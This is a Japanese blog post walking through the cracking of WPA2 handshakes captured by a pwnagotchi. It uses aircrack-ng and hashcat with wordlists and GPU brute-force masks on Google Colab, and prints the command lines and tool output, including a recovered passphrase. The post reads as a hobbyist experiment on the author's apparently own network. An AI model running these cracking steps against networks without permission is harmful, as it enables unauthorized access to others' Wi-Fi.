More than 3 years have passed since last update.

pwnagotchi の handshakes を分析

Last updated at 2021-08-14Posted at 2020-05-07

履歴

2021/08/14 hashcat -m 2500 が廃止されました。 hashcat -m 22000 です。
2021/06/18 Google Colaboratory の無料利用枠が使わせてくれません。

pcap ファイルの分析

pwnagotchi の作り方はこちら( https://qiita.com/k0uj1k/items/f91a3b7e3a4b9209774f )

pwnagotchi が handshakes した pcap ファイルを Kali linux へ持ってきます。
辞書から照合していきます。

辞書のダウンロード

# git clone https://github.com/kennyn510/wpa2-wordlists.git

pwnagotchi からの取り込み

damedame_xxxxxxxxxxxxxx.pcap を使って分析します。
Kali Linux で handshakes ディレクトリが参照できるようにしておきます。
ここから、

# scp -pr pi@10.0.0.2:/home/pi/handshakes ~
# cp ~/handshakes/damedame_xxxxxxxxxxxxxx.pcap ~/work
# cd work

work ディレクトリで作業します。

aircrack-ng で分析

引数にESSIDが必要です、ほとんどの場合ファイル名の_の前がESSIDですが、ESSID に-などが含まれているとファイル名と違う場合があるので、tsharkで確認します。

# tshark -r damedame_xxxxxxxxxxxxxx.pcap
(略)
    4  -0.016541 ABCDEFG_aa:aa:aa → Apple_00:00:00 802.11 209 Probe Response, SN=2282, FN=0, Flags=........C, BI=100, SSID=damedame
(略)

SSID=damedame と確認できます。

aircrack-ng

ダウンロードした辞書を使って分析をします。
# 今回は例として”P”から始まる絞り込んだ辞書を使いました。

# aircrack-ng damedame_xxxxxxxxxxxxxx.pcap -w wpa2-wordlists/Wordlists/Rockyou/P.txt -e damedame

分析画面に(全画面表示に)変わります。

分析画面

辞書照合していきます。


                               Aircrack-ng 1.6 

      [00:00:16] 53586/536377 keys tested (3401.86 k/s) 

      Time left: 2 minutes, 21 seconds                           9.99%

                          KEY FOUND! [ password123 ]


      Master Key     : 6C DC 28 E5 EE D6 0D D3 24 8D 42 A9 94 FA 40 DA 
                       8F C6 7B 3B BB 4E F2 32 84 48 E7 D5 47 3A A4 E7 

      Transient Key  : D8 8F 19 22 3B 86 AD B3 25 E7 E4 93 BA 54 9D A4 
                       95 0E D5 5F 6F 8B 09 BE 26 D0 91 F5 47 90 3F 11 
                       9A AB 21 45 F3 EC 45 F4 0C 19 02 13 7C DB 8E 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : CB A5 D7 88 A6 CF 36 71 CB 53 F6 EB CC 8C BE CC

あらら、発見されましたね。

2分半ぐらいかかりましたね。

hashcat で内容分析

pcap ファイルからhccapx ファイルへの返還のために hashcat-utils を利用します。

hashcat-utils のビルド

# git clone https://github.com/hashcat/hashcat-utils

# cd hashcat-utils
# cd src
# make
# cd ../..

pcap ファイルを変換

に pcap ファイルをアップロードして、convert した後、ダウンロードします。

zzzzzz.hc22000 拡張子が hc22000 というファイルを取得します。

hashcat -m22000

こちらでも、ダウンロードした辞書を使って分析をします。
# 今回は例として”P”から始まる絞り込んだ辞書を使いました。

# hashcat --force -m 22000 damedame_xxxxxxxxxxxxxx.hccapx wpa2-wordlists/Wordlists/Rockyou/P.txt 
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz, 1024/2955 MB allocatable, 2MCU

Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=2500 -D _unroll'
Dictionary cache built:
* Filename..: wpa2-wordlists/Wordlists/Rockyou/P.txt
* Passwords.: 536377
* Bytes.....: 5367337
* Keyspace..: 536377
* Runtime...: 0 secs

346f71dc3e3a2693d747d437217829e5:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
17d763d85546808a1a77ac2228c1c3c7:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
41e2bb5f70b2ca7ae6b25832342b06c6:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
04173eeb81c18a45d16816d063ec0479:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
b4fe69e2cfcc15df3caffe4b6adc3a2a:yyyyyyyyyyyy:zzzzzzzzzzzz:damedame:password123
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

また発見されましたね。

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxxxx.hccapx
Time.Started.....: Wed May  6 20:27:58 2020 (26 secs)
Time.Estimated...: Wed May  6 20:30:03 2020 (1 min, 39 secs)
Guess.Base.......: File (wpa2-wordlists/Wordlists/Rockyou/P.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     3807 H/s (6.84ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 5/6 (83.33%) Digests, 0/1 (0.00%) Salts
Progress.........: 157123/536377 (29.29%)
Rejected.........: 58819/157123 (37.44%)
Restore.Point....: 156773/536377 (29.23%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3712-3840
Candidates.#1....: putol_003 -> putalamierda5673

1分半ですか。

hashcat では辞書なしで分析ができますが、
https://hashcat.net/hashcat/
によると、

GPU Driver requirements:

AMD GPUs on Linux require "RadeonOpenCompute (ROCm)" Software Platform (1.6.180 or later)
AMD GPUs on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
Intel CPUs require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
Intel GPUs on Linux require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
Intel GPUs on Windows require "OpenCL Driver for Intel Iris and Intel HD Graphics"
NVIDIA GPUs require "NVIDIA Driver" (367.x or later)
とGPUドライバが必要です。
無い場合は、ものすごく時間がかかります

Session..........: hashcat
Status...........: Quit
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxxxx.hccapx
Time.Started.....: Wed Jun  3 15:16:52 2020 (3 mins, 39 secs)
Time.Estimated...: Next Big Bang (9196 years, 212 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     7196 H/s (393.18ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1
Recovered........: 0/94 (0.00%) Digests
Progress.........: 1572864/2088270645760000 (0.00%)
Rejected.........: 0/1572864 (0.00%)
Restore.Point....: 49152/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:18-19 Iteration:0-94
Candidates.#1....: wtfwnane1234 -> wwvgonan1234

9200年かかる。

GPUをぶん回してみたいです。

Google Colaboratory

GPUを無料でぶん回してみたかったので、Google Colaboratory で試してみました。

hashcat (v6.0.0-33-g75d801e1) starting...

* Device #1: This hardware has outdated CUDA compute capability (3.7).
             For modern OpenCL performance, upgrade to hardware that supports
             CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #2: This hardware has outdated CUDA compute capability (3.7).
             For modern OpenCL performance, upgrade to hardware that supports
             CUDA compute capability version 5.0 (Maxwell) or higher.
nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 10.1)
====================
* Device #1: Tesla K80, 11373/11441 MB, 13MCU

OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla K80, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 292 MB

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Fri Jul 10 09:05:02 2020 (20 secs)
Time.Estimated...: Wed Jun 25 18:01:21 2769 (748 years, 350 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    88356 H/s (73.13ms) @ Accel:32 Loops:64 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 1703936/2088270645760000 (0.00%)
Rejected.........: 0/1703936 (0.00%)
Restore.Point....: 0/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:4-5 Iteration:832-896
Candidates.#1....: aarierin1234 -> aqmbxxxx1234
Hardware.Mon.#1..: Temp: 50c Util:100% Core: 823MHz Mem:2505MHz Bus:16

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Tesla K80, 2860/11441 MB allocatable, 13MCU でも　 750年 かかるのか！

hashcat (v6.0.0-34-g57776832) starting...

nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 10.1)
====================
* Device #1: Tesla T4, 14969/15079 MB, 40MCU

OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla T4, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 766 MB

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s


Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Fri Jul 10 12:51:07 2020 (26 secs)
Time.Estimated...: Mon Dec 21 14:26:15 2212 (192 years, 163 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   343.9 kH/s (58.81ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 8847360/2088270645760000 (0.00%)
Rejected.........: 0/8847360 (0.00%)
Restore.Point....: 327680/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:1-2 Iteration:512-768
Candidates.#1....: mefjyone1234 -> midgkine1234
Hardware.Mon.#1..: Temp: 62c Util:100% Core:1200MHz Mem:5000MHz Bus:16

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Tesla T4, 14969/15079 MB, 40MCU をたまたまつかんだんだけど、これでも 193年かかるのか！

hashcat (v6.0.0-34-g57776832) starting...

nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 10.1)
====================
* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU

OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla P100-PCIE-16GB, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1047 MB

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s


Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Sat Jul 11 12:11:10 2020 (25 secs)
Time.Estimated...: Fri Apr  1 19:23:00 2163 (142 years, 264 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   463.7 kH/s (60.73ms) @ Accel:16 Loops:128 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 11010048/2088270645760000 (0.00%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 0/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:12-13 Iteration:2176-2304
Candidates.#1....: harierin1234 -> hwhieyon1234
Hardware.Mon.#1..: Temp: 49c Util:100% Core:1328MHz Mem: 715MHz Bus:16

Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU だと、143年 かかる。

ハックザプラネット！

You get articles that match your needs
You can efficiently read back useful information
You can use dark theme

What you can do with signing up